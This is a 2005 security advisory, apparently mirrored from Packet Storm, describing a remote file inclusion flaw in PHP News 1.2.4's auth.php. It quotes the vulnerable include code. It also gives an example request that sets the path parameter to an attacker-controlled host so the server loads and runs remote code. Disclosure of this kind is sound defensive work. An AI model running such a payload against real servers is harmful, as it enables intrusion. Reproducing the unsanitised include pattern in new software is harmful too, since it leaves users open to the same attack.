Lucene search
K

phpnews124.txt

🗓️ 03 Mar 2005 00:00:00Reported by Filip GroszynskiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

PHP News 1.2.4 has a vulnerabilities in auth.php allowing exploitation if configuration settings are misconfigured.

Code
`  
  
-- == -- == -- == -- == -- == -- == -- == -- == -- == --  
Name: PHP News  
Version: 1.2.4 (and possibly 1.2.3)  
Homepage: http://newsphp.sourceforge.net/  
  
Author: Filip Groszynski (VXSfx)  
Date: 23 February 2005  
-- == -- == -- == -- == -- == -- == -- == -- == -- == --  
  
Vulnerable code in auth.php:  
  
if (is_Array($userDetails)) {  
...  
}  
/* You're about to log in/no user language is specified */  
else if(file_exists($path . 'languages/' . $lang . '.admin.lng')) {  
include_once($path . 'languages/' . $lang . '.admin.lng');  
....  
} else {  
include_once($path . 'languages/en_GB.admin.lng');  
....  
}  
  
--------------------------------------------------------  
  
Example:  
  
if register_globals=on and allow_url_fopen=on:  
http://[victim]/[dir]/auth.php?path=http://[hacker_box]/  
  
--------------------------------------------------------  
  
Fix and Vendor status:  
  
Vendor has been notified, expect an official patch tomorrow.  
  
--------------------------------------------------------  
  
Contact:  
  
Author: Filip Groszynski (VXSfx)  
Location: Poland <Warsaw>  
Email: groszynskif <at> gmail <dot> com  
HP: http://shell.homeunix.org  
  
-- == -- == -- == -- == -- == -- == -- == -- == -- == --  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Mar 2005 00:00Current
7.4High risk
Vulners AI Score7.4
22